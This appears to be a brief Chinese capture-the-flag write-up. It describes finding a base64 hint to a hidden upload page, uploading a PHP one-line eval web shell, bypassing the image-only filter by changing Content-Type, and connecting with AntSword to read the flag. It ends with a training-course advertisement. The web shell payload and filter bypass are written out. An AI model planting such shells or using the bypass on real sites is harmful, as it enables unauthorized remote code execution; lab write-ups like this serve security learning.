初始界面有三个按钮,红色的有跳转 flag.php,黄色的是刷新界面。跳转至 flag.php,用 ctrl+U 打开源码,在最下面看见提示base64解密后得到:hidden_page.phphidden_page.php 发现文件上传功能上传一句话木马:<?php @eval($_POST["cmd"]); ?>显示只能上传 jpg 和 png 文件,猜测通过更改 Content-Type 为image/jpeg 绕过抓包更改无错误提示,猜测上传成功无路径显示,尝试访问子目录/upload 查看是否存在可访问,空白显示,确认上传成功,用蚁剑连接在根目录下看见 flag 文件:flag{35ebaec6-3155-4ac9-b1fd-76fde3f24277}
[培训]科锐逆向工程师培训第53期2025年7月8日开班!
